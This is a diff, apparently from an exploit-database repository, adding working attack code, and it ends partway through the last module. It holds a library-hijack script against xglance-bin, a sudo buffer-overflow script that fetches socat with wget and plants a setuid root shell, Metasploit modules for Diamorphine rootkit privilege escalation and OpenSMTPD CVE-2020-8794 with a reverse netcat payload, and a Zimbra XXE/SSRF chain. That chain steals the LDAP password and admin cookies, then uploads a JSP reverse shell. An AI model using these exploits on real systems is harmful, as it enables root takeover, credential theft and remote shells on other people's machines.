+int _XmxpmGetRgbName = 0;
+int _XmxpmGetString = 0;
+int _XmxpmHashIntern = 0;
+int _XmxpmHashSlot = 0;
+int _XmxpmHashTableFree = 0;
+int _XmxpmHashTableInit = 0;
+int _XmxpmInitAttributes = 0;
+int _XmxpmInitXpmImage = 0;
+int _XmxpmInitXpmInfo = 0;
+int _XmxpmNextString = 0;
+int _XmxpmNextUI = 0;
+int _XmxpmNextWord = 0;
+int _XmxpmParseColors = 0;
+int _XmxpmParseData = 0;
+int _XmxpmParseDataAndCreate = 0;
+int _XmxpmParseExtensions = 0;
+int _XmxpmParseHeader = 0;
+int _XmxpmParseValues = 0;
+int _XmxpmReadRgbNames = 0;
+int _XmxpmSetAttributes = 0;
+int _XmxpmSetInfo = 0;
+int _XmxpmSetInfoMask = 0;
+int _Xmxpm_xynormalizeimagebits = 0;
+int _Xmxpm_znormalizeimagebits = 0;
+int XNextEvent = 0;
+int XOffsetRegion = 0;
+int XOMOfOC = 0;
+int XOpenDisplay = 0;
+int XOpenIM = 0;
+int XParseColor = 0;
+int XPeekEvent = 0;
+int XPending = 0;
+int Xpms_popen = 0;
+int XPolygonRegion = 0;
+int XPutBackEvent = 0;
+int XPutImage = 0;
+int XQueryBestCursor = 0;
+int XQueryColor = 0;
+int XQueryColors = 0;
+int XQueryPointer = 0;
+int XQueryTree = 0;
+int XRaiseWindow = 0;
+int XReadBitmapFileData = 0;
+int XRecolorCursor = 0;
+int XRectInRegion = 0;
+int XReparentWindow = 0;
+int XrmCombineDatabase = 0;
+int XrmDestroyDatabase = 0;
+int XrmGetStringDatabase = 0;
+int XrmPermStringToQuark = 0;
+int XrmPutResource = 0;
+int XrmPutStringResource = 0;
+int XrmQGetResource = 0;
+int XrmQGetSearchList = 0;
+int XrmQGetSearchResource = 0;
+int XrmQuarkToString = 0;
+int XrmStringToQuark = 0;
+int XrmUniqueQuark = 0;
+int XRotateBuffers = 0;
+int XSaveContext = 0;
+int XScreenCount = 0;
+int XScreenNumberOfScreen = 0;
+int XScreenOfDisplay = 0;
+int XSelectInput = 0;
+int XSendEvent = 0;
+int XSetClipMask = 0;
+int XSetClipOrigin = 0;
+int XSetClipRectangles = 0;
+int XSetCloseDownMode = 0;
+int XSetErrorHandler = 0;
+int XSetFillStyle = 0;
+int XSetForeground = 0;
+int XSetFunction = 0;
+int XSetICFocus = 0;
+int XSetICValues = 0;
+int XSetInputFocus = 0;
+int XSetLineAttributes = 0;
+int XSetLocaleModifiers = 0;
+int XSetOCValues = 0;
+int XSetRegion = 0;
+int XSetSelectionOwner = 0;
+int XSetStipple = 0;
+int XSetTextProperty = 0;
+int XSetTSOrigin = 0;
+int XSetWindowBackground = 0;
+int XSetWindowBackgroundPixmap = 0;
+int XSetWMColormapWindows = 0;
+int XShapeCombineMask = 0;
+int XShapeCombineRectangles = 0;
+int XShapeQueryExtension = 0;
+int __xstat64 = 0;
+int XStoreBuffer = 0;
+int XStoreColor = 0;
+int XStringToKeysym = 0;
+int XSubtractRegion = 0;
+int XSync = 0;
+int XtAddCallback = 0;
+int XtAddEventHandler = 0;
+int XtAddGrab = 0;
+int XtAddRawEventHandler = 0;
+int XtAllocateGC = 0;
+int XtAppAddTimeOut = 0;
+int XtAppAddWorkProc = 0;
+int XtAppCreateShell = 0;
+int XtAppErrorMsg = 0;
+int XtAppGetExitFlag = 0;
+int XtAppGetSelectionTimeout = 0;
+int XtAppLock = 0;
+int XtAppNextEvent = 0;
+int XtAppPending = 0;
+int XtAppProcessEvent = 0;
+int XtAppSetSelectionTimeout = 0;
+int XtAppSetTypeConverter = 0;
+int XtAppSetWarningMsgHandler = 0;
+int XtAppUnlock = 0;
+int XtAppWarningMsg = 0;
+int XtAugmentTranslations = 0;
+int XtBuildEventMask = 0;
+int XtCallActionProc = 0;
+int XtCallCallbackList = 0;
+int XtCallCallbacks = 0;
+int XtCallConverter = 0;
+int XtCalloc = 0;
+int XtCancelSelectionRequest = 0;
+int XtConfigureWidget = 0;
+int XtConvertAndStore = 0;
+int XtConvertCase = 0;
+int XtCreateManagedWidget = 0;
+int XtCreatePopupShell = 0;
+int XtCreateSelectionRequest = 0;
+int XtCreateWidget = 0;
+int XtCreateWindow = 0;
+int XtCvtStringToFontSet = 0;
+int XtCvtStringToFontStruct = 0;
+int XtCvtStringToPixel = 0;
+int XtDatabase = 0;
+int XtDestroyApplicationContext = 0;
+int XtDestroyWidget = 0;
+int XtDisownSelection = 0;
+int XtDispatchEvent = 0;
+int XtDisplayOfObject = 0;
+int XtDisplayStringConversionWarning = 0;
+int XtDisplayToApplicationContext = 0;
+int XtError = 0;
+int XtErrorMsg = 0;
+int XTextExtents = 0;
+int XTextExtents16 = 0;
+int XTextWidth = 0;
+int XTextWidth16 = 0;
+int XtFree = 0;
+int XtGetActionKeysym = 0;
+int XtGetApplicationNameAndClass = 0;
+int XtGetApplicationResources = 0;
+int XtGetConstraintResourceList = 0;
+int XtGetErrorDatabaseText = 0;
+int XtGetGC = 0;
+int XtGetKeysymTable = 0;
+int XtGetMultiClickTime = 0;
+int XtGetResourceList = 0;
+int XtGetSelectionParameters = 0;
+int XtGetSelectionRequest = 0;
+int XtGetSelectionValue = 0;
+int XtGetSelectionValueIncremental = 0;
+int XtGetSelectionValues = 0;
+int XtGetSelectionValuesIncremental = 0;
+int XtGetSubresources = 0;
+int XtGetSubvalues = 0;
+int XtGetValues = 0;
+int XtGrabButton = 0;
+int XtGrabKey = 0;
+int XtGrabKeyboard = 0;
+int XtGrabPointer = 0;
+int XtHasCallbacks = 0;
+int _XtInherit = 0;
+int _XtInheritTranslations = 0;
+int XtInitializeWidgetClass = 0;
+int XtInsertEventHandler = 0;
+int XtInstallAccelerators = 0;
+int XtIsManaged = 0;
+int XtIsSensitive = 0;
+int XtIsSubclass = 0;
+int _XtIsSubclassOf = 0;
+int XtLastEventProcessed = 0;
+int XtLastTimestampProcessed = 0;
+int XtMakeGeometryRequest = 0;
+int XtMakeResizeRequest = 0;
+int XtMalloc = 0;
+int XtManageChild = 0;
+int XtManageChildren = 0;
+int XtMergeArgLists = 0;
+int XtMoveWidget = 0;
+int XtName = 0;
+int XtNameToWidget = 0;
+int XtOverrideTranslations = 0;
+int XtOwnSelection = 0;
+int XtOwnSelectionIncremental = 0;
+int XtParseAcceleratorTable = 0;
+int XtParseTranslationTable = 0;
+int XtPopdown = 0;
+int XtPopup = 0;
+int XtProcessLock = 0;
+int XtProcessUnlock = 0;
+int XtQueryGeometry = 0;
+int XTranslateCoordinates = 0;
+int XtRealizeWidget = 0;
+int XtRealloc = 0;
+int XtRegisterGrabAction = 0;
+int XtReleaseGC = 0;
+int XtRemoveAllCallbacks = 0;
+int XtRemoveCallback = 0;
+int XtRemoveEventHandler = 0;
+int XtRemoveGrab = 0;
+int XtRemoveTimeOut = 0;
+int XtRemoveWorkProc = 0;
+int XtResizeWidget = 0;
+int XtResolvePathname = 0;
+int XtScreenDatabase = 0;
+int XtScreenOfObject = 0;
+int XtSendSelectionRequest = 0;
+int XtSetKeyboardFocus = 0;
+int XtSetKeyTranslator = 0;
+int XtSetMappedWhenManaged = 0;
+int XtSetSelectionParameters = 0;
+int XtSetSensitive = 0;
+int XtSetSubvalues = 0;
+int XtSetTypeConverter = 0;
+int XtSetValues = 0;
+int XtShellStrings = 0;
+int XtStrings = 0;
+int XtTranslateCoords = 0;
+int XtTranslateKey = 0;
+int XtUngrabButton = 0;
+int XtUngrabKey = 0;
+int XtUngrabKeyboard = 0;
+int XtUngrabPointer = 0;
+int XtUnmanageChild = 0;
+int XtUnmanageChildren = 0;
+int XtVaCreateManagedWidget = 0;
+int XtVaCreateWidget = 0;
+int XtVaGetValues = 0;
+int XtVaSetValues = 0;
+int XtWarning = 0;
+int XtWarningMsg = 0;
+int XtWidgetToApplicationContext = 0;
+int XtWindowOfObject = 0;
+int XtWindowToWidget = 0;
+int XUngrabKeyboard = 0;
+int XUngrabPointer = 0;
+int XUngrabServer = 0;
+int XUnionRectWithRegion = 0;
+int XUnionRegion = 0;
+int XUnmapWindow = 0;
+int XUnsetICFocus = 0;
+int Xutf8DrawImageString = 0;
+int Xutf8DrawString = 0;
+int Xutf8TextEscapement = 0;
+int Xutf8TextExtents = 0;
+int Xutf8TextListToTextProperty = 0;
+int XVaCreateNestedList = 0;
+int XWarpPointer = 0;
+int XwcDrawImageString = 0;
+int XwcDrawString = 0;
+int XwcTextEscapement = 0;
+int XwcTextExtents = 0;
+int XWidthOfScreen = 0;
+int XWindowEvent = 0;
+int XWithdrawWindow = 0;
+int overrideShellWidgetClass = 0;
+
+DONE
+
+echo "[+] Compiling the code..."
+/usr/bin/gcc -fPIC -shared -static-libgcc -o libXm.so.3 lib.c
+
+echo "[+] Cleaning up..."
+/bin/rm -f lib.c 
+
+mkdir -p ./-L/lib64
+mv libXm.so.3 ./-L/lib64
+cd ./-L/lib64
+ln -s libXm.so.3 libXp.so.6
+ln -s libXm.so.3 libXt.so.6
+cd ../../
+
+echo "[+] Attempting to exploit the xglance-bin: "
+
+/opt/perf/bin/xglance-bin
\ No newline at end of file
diff --git a/exploits/linux/local/48052.sh b/exploits/linux/local/48052.sh
new file mode 100755
index 000000000..7ba732aec
--- /dev/null
+++ b/exploits/linux/local/48052.sh
@@ -0,0 +1,52 @@
+#!/bin/bash
+# We will need socat to run this.
+if [ ! -f socat ];
+then
+    wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/socat
+    chmod +x socat
+fi
+
+cat <<EOF > xpl.pl
+\$buf_sz = 256;
+\$askpass_sz = 32;
+\$signo_sz = 4*65;
+\$tgetpass_flag = "\x04\x00\x00\x00" . ("\x00"x24);
+print("\x00\x15"x(\$buf_sz+\$askpass_sz) .
+     ("\x00\x15"x\$signo_sz) .
+     (\$tgetpass_flag) . "\x37\x98\x01\x00\x35\x98\x01\x00\x35\x98\x01\x00\xff\xff\xff\xff\x35\x98\x01\x00\x00\x00\x00\x00".
+     "\x00\x00\x00\x00\x00\x15"x104 . "\n");
+EOF
+
+cat <<EOF > exec.c
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+int main(void)
+{
+        printf("Exploiting!\n");
+        int fd = open("/proc/self/exe", O_RDONLY);
+        struct stat st;
+        fstat(fd, &st);
+        if (st.st_uid != 0)
+        {
+                fchown(fd, 0, st.st_gid);
+                fchmod(fd, S_ISUID|S_IRUSR|S_IWUSR|S_IXUSR|S_IXGRP);
+        }
+        else
+        {
+                setuid(0);
+                execve("/bin/bash",NULL,NULL);
+        }
+return 0;
+}
+EOF
+cc -w exec.c -o /tmp/pipe
+./socat pty,link=/tmp/pty,waitslave exec:"perl xpl.pl"&
+sleep 0.5
+export SUDO_ASKPASS=/tmp/pipe
+sudo -k -S id < /tmp/pty
+/tmp/pipe
\ No newline at end of file
diff --git a/exploits/linux/local/48131.rb b/exploits/linux/local/48131.rb
new file mode 100755
index 000000000..15f0e22cb
--- /dev/null
+++ b/exploits/linux/local/48131.rb
@@ -0,0 +1,115 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = ExcellentRanking
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Diamorphine Rootkit Signal Privilege Escalation',
+      'Description'    => %q{
+        This module uses Diamorphine rootkit's privesc feature using signal
+        64 to elevate the privileges of arbitrary processes to UID 0 (root).
+
+        This module has been tested successfully with Diamorphine from `master`
+        branch (2019-10-04) on Linux Mint 19 kernel 4.15.0-20-generic (x64).
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'm0nad', # Diamorphine
+          'bcoles' # Metasploit
+        ],
+      'DisclosureDate' => '2013-11-07', # Diamorphine first public commit
+      'References'     =>
+        [
+          ['URL', 'https://github.com/m0nad/Diamorphine']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'SessionTypes'   => ['shell', 'meterpreter'],
+      'Targets'        => [['Auto', {}]],
+      'Notes'          =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability'   => [ CRASH_SAFE ]
+        },
+      'DefaultTarget'  => 0))
+    register_options [
+      OptInt.new('SIGNAL', [true, 'Diamorphine elevate signal', 64])
+    ]
+    register_advanced_options [
+      OptBool.new('ForceExploit', [false, 'Override check result', false]),
+      OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp'])
+    ]
+  end
+
+  def signal
+    datastore['SIGNAL'].to_s
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def upload_and_chmodx(path, data)
+    print_status "Writing '#{path}' (#{data.size} bytes) ..."
+    write_file path, data
+    chmod path, 0755
+  end
+
+  def cmd_exec_elevated(cmd)
+    vprint_status "Executing #{cmd} ..."
+    res = cmd_exec("sh -c 'kill -#{signal} $$ && #{cmd}'").to_s
+    vprint_line res unless res.blank?
+    res
+  end
+
+  def check
+    res = cmd_exec_elevated 'id'
+
+    if res.include?('invalid signal')
+      return CheckCode::Safe("Signal '#{signal}' is invalid")
+    end
+
+    unless res.include?('uid=0')
+      return CheckCode::Safe("Diamorphine is not installed, or incorrect signal '#{signal}'")
+    end
+
+    CheckCode::Vulnerable("Diamorphine is installed and configured to handle signal '#{signal}'.")
+  end
+
+  def exploit
+    unless check == CheckCode::Vulnerable
+      unless datastore['ForceExploit']
+        fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
+      end
+      print_warning 'Target does not appear to be vulnerable'
+    end
+
+    if is_root?
+      unless datastore['ForceExploit']
+        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+      end
+    end
+
+    unless writable? base_dir
+      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    end
+
+    payload_name = ".#{rand_text_alphanumeric 8..12}"
+    payload_path = "#{base_dir}/#{payload_name}"
+    upload_and_chmodx payload_path, generate_payload_exe
+    register_file_for_cleanup payload_path
+
+    cmd_exec_elevated "#{payload_path} & echo "
+  end
+end
\ No newline at end of file
diff --git a/exploits/linux/local/48185.rb b/exploits/linux/local/48185.rb
new file mode 100755
index 000000000..ea415ace2
--- /dev/null
+++ b/exploits/linux/local/48185.rb
@@ -0,0 +1,180 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Local
+
+  # smtpd(8) may crash on a malformed message
+  Rank = AverageRanking
+
+  include Msf::Exploit::Remote::TcpServer
+  include Msf::Exploit::Remote::AutoCheck
+  include Msf::Exploit::Expect
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'OpenSMTPD OOB Read Local Privilege Escalation',
+      'Description'    => %q{
+        This module exploits an out-of-bounds read of an attacker-controlled
+        string in OpenSMTPD's MTA implementation to execute a command as the
+        root or nobody user, depending on the kind of grammar OpenSMTPD uses.
+      },
+      'Author'         => [
+        'Qualys', # Discovery and PoC
+        'wvu'     # Module
+      ],
+      'References'     => [
+        ['CVE', '2020-8794'],
+        ['URL', 'https://seclists.org/oss-sec/2020/q1/96']
+      ],
+      'DisclosureDate' => '2020-02-24',
+      'License'        => MSF_LICENSE,
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => true, # NOTE: Only when exploiting new grammar
+      # Patched in 6.6.4: https://www.opensmtpd.org/security.html
+      # New grammar introduced in 6.4.0: https://github.com/openbsd/src/commit/e396a728fd79383b972631720cddc8e987806546
+      'Targets'        => [
+        ['OpenSMTPD < 6.6.4 (automatic grammar selection)',
+          patched_version:     Gem::Version.new('6.6.4'),
+          new_grammar_version: Gem::Version.new('6.4.0')
+        ]
+      ],
+      'DefaultTarget'  => 0,
+      'DefaultOptions' => {
+        'SRVPORT'      => 25,
+        'PAYLOAD'      => 'cmd/unix/reverse_netcat',
+        'WfsDelay'     => 60 # May take a little while for mail to process
+      },
+      'Notes'          => {
+        'Stability'    => [CRASH_SERVICE_DOWN],
+        'Reliability'  => [REPEATABLE_SESSION],
+        'SideEffects'  => [IOC_IN_LOGS]
+      }
+    ))
+
+    register_advanced_options([
+      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
+    ])
+
+    # HACK: We need to run check in order to determine a grammar to use
+    options.remove_option('AutoCheck')
+  end
+
+  def srvhost_addr
+    Rex::Socket.source_address(session.session_host)
+  end
+
+  def rcpt_to
+    "#{rand_text_alpha_lower(8..42)}@[#{srvhost_addr}]"
+  end
+
+  def check
+    smtpd_help = cmd_exec('smtpd -h')
+
+    if smtpd_help.empty?
+      return CheckCode::Unknown('smtpd(8) help could not be displayed')
+    end
+
+    version = smtpd_help.scan(/^version: OpenSMTPD ([\d.p]+)$/).flatten.first
+
+    unless version
+      return CheckCode::Unknown('OpenSMTPD version could not be found')
+    end
+
+    version = Gem::Version.new(version)
+
+    if version < target[:patched_version]
+      if version >= target[:new_grammar_version]
+        vprint_status("OpenSMTPD #{version} is using new grammar")
+        @grammar = :new
+      else
+        vprint_status("OpenSMTPD #{version} is using old grammar")
+        @grammar = :old
+      end
+
+      return CheckCode::Appears(
+        "OpenSMTPD #{version} appears vulnerable to CVE-2020-8794"
+      )
+    end
+
+    CheckCode::Safe("OpenSMTPD #{version} is NOT vulnerable to CVE-2020-8794")
+  end
+
+  def exploit
+    # NOTE: Automatic check is implemented by the AutoCheck mixin
+    super
+
+    start_service
+
+    sendmail = "/usr/sbin/sendmail '#{rcpt_to}' < /dev/null && echo true"
+
+    print_status("Executing local sendmail(8) command: #{sendmail}")
+    if cmd_exec(sendmail) != 'true'
+      fail_with(Failure::Unknown, 'Could not send mail. Is OpenSMTPD running?')
+    end
+  end
+
+  def on_client_connect(client)
+    print_status("Client #{client.peerhost}:#{client.peerport} connected")
+
+    # Brilliant work, Qualys!
+    case @grammar
+    when :new
+      print_status('Exploiting new OpenSMTPD grammar for a root shell')
+
+      yeet = <<~EOF
+        553-
+        553
+
+        dispatcher: local_mail
+        type: mda
+        mda-user: root
+        mda-exec: #{payload.encoded}; exit 0\x00
+      EOF
+    when :old
+      print_status('Exploiting old OpenSMTPD grammar for a nobody shell')
+
+      yeet = <<~EOF
+        553-
+        553
+
+        type: mda
+        mda-method: mda
+        mda-usertable: <getpwnam>
+        mda-user: nobody
+        mda-buffer: #{payload.encoded}; exit 0\x00
+      EOF
+    else
+      fail_with(Failure::BadConfig, 'Could not determine OpenSMTPD grammar')
+    end
+
+    sploit = {
+      '220' => /EHLO /,
+      '250' => /MAIL FROM:<[^>]/,
+      yeet  => nil
+    }
+
+    print_status('Faking SMTP server and sending exploit')
+    sploit.each do |line, pattern|
+      send_expect(
+        line,
+        pattern,
+        sock:    client,
+        newline: "\r\n",
+        timeout: datastore['ExpectTimeout']
+      )
+    end
+  rescue Timeout::Error => e
+    fail_with(Failure::TimeoutExpired, e.message)
+  ensure
+    print_status("Disconnecting client #{client.peerhost}:#{client.peerport}")
+    client.close
+  end
+
+  def on_client_close(client)
+    print_status("Client #{client.peerhost}:#{client.peerport} disconnected")
+  end
+
+end
\ No newline at end of file
diff --git a/exploits/linux/local/9844.py b/exploits/linux/local/9844.py
index 26efab184..0198ba29b 100755
--- a/exploits/linux/local/9844.py
+++ b/exploits/linux/local/9844.py
@@ -1,13 +1,14 @@
-# This is a PoC based off the PoC release by Earl Chew
+# This is a PoC based off the PoC release by Earl Chew (Updated by Brian Peters)
 # Linux Kernel 'pipe.c' Local Privilege Escalation Vulnerability
 # PoC by Matthew Bergin
 # Bugtraq ID:       36901
 #
-# E-DB Note: Exploit Update ~ https://github.com/offensive-security/exploitdb/pull/82/files
+# E-DB Note: Exploit Update v2 ~ https://github.com/offensive-security/exploitdb/pull/82/files
 
 import os
 import time
 import random
+import subprocess
 #infinite loop
 i = 0
 x = 0
@@ -15,7 +16,9 @@ while (i == 0):
         os.system("sleep 1")
         while (x == 0):
                 time.sleep(random.random()) #random int 0.0-1.0
-                pid = str(os.system("ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }"))
+                p = subprocess.Popen(["ps -elf | grep 'sleep 1' | grep -v 'grep' | awk '{print $4}'"], stdout=subprocess.PIPE, shell=True)
+		result = p.stdout.read()
+		pid = result.replace('\n', '').replace('\r', '')
                 if (pid == "0"): #need an active pid, race condition applies
                         print "[+] Didnt grab PID, got: " + pid + " -- Retrying..."
                         break
diff --git a/exploits/linux/remote/42627.py b/exploits/linux/remote/42627.py
index 76b98f146..97ce52540 100755
--- a/exploits/linux/remote/42627.py
+++ b/exploits/linux/remote/42627.py
@@ -84,7 +84,7 @@ def exploration(command):
 			'Content-Type': 'application/xml'}
 
 	request = requests.post(url, data=exploit, headers=headers)
-	print request.text
+	print (request.text)
 
 if len(sys.argv) < 3:
 	print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
diff --git a/exploits/linux/remote/46693.rb b/exploits/linux/remote/46693.rb
new file mode 100755
index 000000000..37b8f1771
--- /dev/null
+++ b/exploits/linux/remote/46693.rb
@@ -0,0 +1,258 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Zimbra Collaboration Autodiscover Servlet XXE and ProxyServlet SSRF',
+      'Description'    => %q{
+        This module exploits an XML external entity vulnerability and a
+        server side request forgery to get unauthenticated code execution
+        on Zimbra Collaboration Suite. The XML external entity vulnerability
+        in the Autodiscover Servlet is used to read a Zimbra configuration
+        file that contains an LDAP password for the 'zimbra' account. The
+        zimbra credentials are then used to get a user authentication cookie
+        with an AuthRequest message. Using the user cookie, a server side request
+        forgery in the Proxy Servlet is used to proxy an AuthRequest with
+        the 'zimbra' credentials to the admin port to retrieve an admin
+        cookie. After gaining an admin cookie the Client Upload servlet is
+        used to upload a JSP webshell that can be triggered from the web
+        server to get command execution on the host. The issues reportedly
+        affect Zimbra Collaboration Suite v8.5 to v8.7.11.
+
+        This module was tested with Zimbra Release 8.7.1.GA.1670.UBUNTU16.64
+        UBUNTU16_64 FOSS edition.
+      },
+      'Author'         =>
+        [
+          'An Trinh',         # Discovery
+          'Khanh Viet Pham',  # Discovery
+          'Jacob Robles'      # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['CVE', '2019-9670'],
+          ['CVE', '2019-9621'],
+          ['URL', 'https://blog.tint0.com/2019/03/a-saga-of-code-executions-on-zimbra.html']
+        ],
+      'Platform'       => ['linux'],
+      'Arch'           => ARCH_JAVA,
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ]
+        ],
+      'DefaultOptions' => {
+        'RPORT' => 8443,
+        'SSL' => true,
+        'PAYLOAD' => 'java/jsp_shell_reverse_tcp'
+      },
+      'Stance'         => Stance::Aggressive,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => '2019-03-13' # Blog post date
+    ))
+
+    register_options [
+      OptString.new('TARGETURI', [true, 'Zimbra application base path', '/']),
+      OptInt.new('HTTPDELAY', [true, 'Number of seconds the web server will wait before termination', 10])
+    ]
+  end
+
+  def xxe_req(data)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/autodiscover'),
+      'encode_params' => false,
+      'data' => data
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 503
+    res
+  end
+
+  def soap_discover(check_soap=false)
+    xml = REXML::Document.new
+
+    xml.add_element('Autodiscover')
+    xml.root.add_element('Request')
+
+    req = xml.root.elements[1]
+
+    req.add_element('EMailAddress')
+    req.add_element('AcceptableResponseSchema')
+
+    replace_text = 'REPLACE'
+    req.elements['EMailAddress'].text = Faker::Internet.email
+    req.elements['AcceptableResponseSchema'].text = replace_text
+
+    doc = rand_text_alpha_lower(4..8)
+    entity = rand_text_alpha_lower(4..8)
+    local_file = '/etc/passwd'
+
+    res = "<!DOCTYPE #{doc} [<!ELEMENT #{doc} ANY>"
+    if check_soap
+      local = "file://#{local_file}"
+      res << "<!ENTITY #{entity} SYSTEM '#{local}'>]>"
+      res << "#{xml.to_s.sub(replace_text, "&#{entity};")}"
+    else
+      local = "http://#{srvhost_addr}:#{srvport}#{@service_path}"
+      res << "<!ENTITY % #{entity} SYSTEM '#{local}'>"
+      res << "%#{entity};]>"
+      res << "#{xml.to_s.sub(replace_text, "&#{@ent_data};")}"
+    end
+    res
+  end
+
+  def soap_auth(zimbra_user, zimbra_pass, admin=true)
+    urn = admin ? 'urn:zimbraAdmin' : 'urn:zimbraAccount'
+    xml = REXML::Document.new
+
+    xml.add_element(
+      'soap:Envelope',
+      {'xmlns:soap'  => 'http://www.w3.org/2003/05/soap-envelope'}
+    )
+
+    xml.root.add_element('soap:Body')
+    body = xml.root.elements[1]
+    body.add_element(
+      'AuthRequest',
+      {'xmlns' => urn}
+    )
+
+    zimbra_acc = body.elements[1]
+    zimbra_acc.add_element(
+      'account',
+      {'by' => 'adminName'}
+    )
+    zimbra_acc.add_element('password')
+
+    zimbra_acc.elements['account'].text  = zimbra_user
+    zimbra_acc.elements['password'].text = zimbra_pass
+
+    xml.to_s
+  end
+
+  def cookie_req(data)
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/service/soap/'),
+      'data' => data
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
+    res
+  end
+
+  def proxy_req(data, auth_cookie)
+    target = "https://127.0.0.1:7071#{normalize_uri(target_uri, '/service/admin/soap/AuthRequest')}"
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri, '/service/proxy/'),
+      'vars_get' => {'target' => target},
+      'cookie' => "ZM_ADMIN_AUTH_TOKEN=#{auth_cookie}",
+      'data' => data,
+      'headers' => {'Host' => "#{datastore['RHOST']}:7071"}
+    })
+    fail_with(Failure::Unknown, 'Request failed') unless res && res.code == 200
+    res
+  end
+
+  def upload_file(file_name, contents, cookie)
+    data = Rex::MIME::Message.new
+    data.add_part(file_name, nil, nil, 'form-data; name="filename1"')
+    data.add_part(contents, 'application/octet-stream', nil, "form-data; name=\"clientFile\"; filename=\"#{file_name}\"")
+    data.add_part("#{rand_text_numeric(2..5)}", nil, nil, 'form-data; name="requestId"')
+    post_data = data.to_s
+
+    send_request_cgi({
+      'method'          => 'POST',
+      'uri'             => normalize_uri(target_uri, '/service/extension/clientUploader/upload'),
+      'ctype'           => "multipart/form-data; boundary=#{data.bound}",
+      'data'            => post_data,
+      'cookie'          => cookie
+    })
+  end
+
+  def check
+    begin
+      res = xxe_req(soap_discover(true))
+    rescue Msf::Exploit::Failed
+      return CheckCode::Unknown
+    end
+
+    if res.body.include?('zimbra')
+      return CheckCode::Vulnerable
+    end
+
+    CheckCode::Unknown
+  end
+
+  def on_request_uri(cli, req)
+    ent_file = rand_text_alpha_lower(4..8)
+    ent_eval = rand_text_alpha_lower(4..8)
+
+    dtd =  <<~HERE
+    <!ENTITY % #{ent_file} SYSTEM "file:///opt/zimbra/conf/localconfig.xml">
+    <!ENTITY % #{ent_eval} "<!ENTITY #{@ent_data} '<![CDATA[%#{ent_file};]]>'>">
+    %#{ent_eval};
+    HERE
+    send_response(cli, dtd)
+  end
+
+  def primer
+    datastore['SSL'] = @ssl
+    res = xxe_req(soap_discover)
+    fail_with(Failure::UnexpectedReply, 'Password not found') unless res.body =~ /ldap_password.*?value>(.*?)<\/value/m
+    password = $1
+    username = 'zimbra'
+
+    print_good("Password found: #{password}")
+
+    data = soap_auth(username, password, false)
+    res = cookie_req(data)
+
+    fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /ZM_AUTH_TOKEN=([^;]+;)/
+    auth_cookie = $1
+
+    print_good("User cookie retrieved: ZM_AUTH_TOKEN=#{auth_cookie}")
+
+    data = soap_auth(username, password)
+    res = proxy_req(data, auth_cookie)
+
+    fail_with(Failure::NoAccess, 'Failed to authenticate') unless res.get_cookies =~ /(ZM_ADMIN_AUTH_TOKEN=[^;]+;)/
+    admin_cookie = $1
+
+    print_good("Admin cookie retrieved: #{admin_cookie}")
+
+    stager_name = "#{rand_text_alpha(8..16)}.jsp"
+    print_status('Uploading jsp shell')
+    res = upload_file(stager_name, payload.encoded, admin_cookie)
+
+    fail_with(Failure::Unknown, "#{peer} - Unable to upload stager") unless res && res.code == 200
+    # Only shell sessions are supported
+    register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name}' -type f)")
+    register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name[0...-4]}.*1StreamConnector.class' -type f)")
+    register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name[0...-4]}.*class' -type f)")
+    register_file_for_cleanup("$(find /opt/zimbra/ -regex '.*downloads/.*#{stager_name[0...-4]}.*java' -type f)")
+
+    print_status("Executing payload on /downloads/#{stager_name}")
+    res = send_request_cgi({
+      'uri'             => normalize_uri(target_uri, "/downloads/#{stager_name}"),
+      'cookie'          => admin_cookie
+    })
+  end
+
+  def exploit
+    @ent_data = rand_text_alpha_lower(4..8)
+    @ssl = datastore['SSL']
+    datastore['SSL'] = false
